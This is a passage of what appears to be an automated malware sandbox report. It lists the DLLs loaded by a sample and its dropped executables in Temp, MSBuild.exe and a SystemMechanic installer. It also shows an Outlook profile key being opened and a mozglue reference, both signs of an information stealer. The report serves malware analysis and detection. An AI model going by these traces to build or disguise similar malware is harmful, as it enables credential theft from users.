                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cscapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bitsproxy.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: security.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: olepro32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: schedcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: logoncli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: msxml6.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: idndl.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: bitsproxy.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: dwmapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: msimg32.dll
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: oledlg.dll
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: oleacc.dll
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: netapi32.dll
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: wtsapi32.dll
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: netutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: samcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: dwmapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: riched20.dll
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: usp10.dll
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: msls31.dll
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: dbghelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: pla.dll
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: pdh.dll
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: tdh.dll
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: cabinet.dll
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: wevtapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: shdocvw.dll
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: ntmarta.dll
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: winhttp.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: shdocvw.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dwrite.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: msvcp140_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: windowscodecs.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: amsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dwmapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: d3d9.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: d3d10warp.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wtsapi32.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: winsta.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: powrprof.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: umpdc.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: textshaping.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dataexchange.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: d3d11.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dcomp.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dxgi.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: twinapi.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: resourcepolicyclient.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dxcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: urlmon.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: iertutil.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: srvcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: netutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: textinputframework.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: coreuicomponents.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: coremessaging.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ntmarta.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: coremessaging.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: msctfui.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: uiautomationcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: d3dcompiler_47.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dnsapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: winnsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wbemcomn.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: napinsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: pnrpnsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wshbth.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: nlaapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: winrnr.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: rasapi32.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: rasman.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: rtutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: winhttp.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: rasadhlp.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: fwpuclnt.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: secur32.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: schannel.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: mskeyprotect.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ntasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ncrypt.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ncryptsslp.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: msasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: gpapi.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                              Source: VucRf0jboS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                              Source: VucRf0jboS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                              Source: VucRf0jboS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                              Source: VucRf0jboS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: VucRf0jboS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                              Source: VucRf0jboS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                              Source: VucRf0jboS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: Binary string: mozglue.pdbP source: u5qk.0.exe, 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmp
